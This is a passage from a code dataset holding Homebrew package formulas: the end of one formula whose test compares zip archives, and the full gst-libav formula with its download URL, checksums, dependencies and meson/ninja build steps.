system "make", "install"
end
test do
touch "file1"
system "zip", "file1.zip", "file1"
touch "file2"
system "zip", "file2.zip", "file1", "file2"
assert_match /\+.*file2/, shell_output("#{bin}/zipcmp -v file1.zip file2.zip", 1)
end
end
| 30.764706 | 85 | 0.643403 |
d5045781bc52f4ec8cb29f291706236ff7a065fe | 1,318 | class GstLibav < Formula
desc "GStreamer plugins for Libav (a fork of FFmpeg)"
homepage "https://gstreamer.freedesktop.org/"
url "https://gstreamer.freedesktop.org/src/gst-libav/gst-libav-1.18.1.tar.xz"
sha256 "39a717bc2613efbbba19df3cf5cacff0987471fc8281ba2c5dcdeaded79c2ed8"
license "LGPL-2.1-or-later"
revision 1
head "https://anongit.freedesktop.org/git/gstreamer/gst-libav.git"
livecheck do
url "https://gstreamer.freedesktop.org/src/gst-libav/"
regex(/href=.*?gst-libav[._-]v?(\d+\.\d*[02468](?:\.\d+)*)\.t/i)
end
bottle do
cellar :any
sha256 "4fbab8e339a32dff4c432113f6e84608702f384c5c9f22eb74140fd3c3c0205b" => :catalina
sha256 "3e97b626bbdd6c767a8c56e8669a4881e7506f76092776baf1f0f6a830f3b562" => :mojave
sha256 "0d0dacf7c90b1f46e79604b596032ae642c8404f7ee7bfa70df2d6cba2ef2a62" => :high_sierra
end
depends_on "meson" => :build
depends_on "ninja" => :build
depends_on "pkg-config" => :build
depends_on "yasm" => :build
depends_on "ffmpeg"
depends_on "gst-plugins-base"
depends_on "xz" # For LZMA
def install
mkdir "build" do
system "meson", *std_meson_args, ".."
system "ninja", "-v"
system "ninja", "install", "-v"
end
end
test do
system "#{Formula["gstreamer"].opt_bin}/gst-inspect-1.0", "libav"
end
end
| 31.380952 | 93 | 0.707132 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.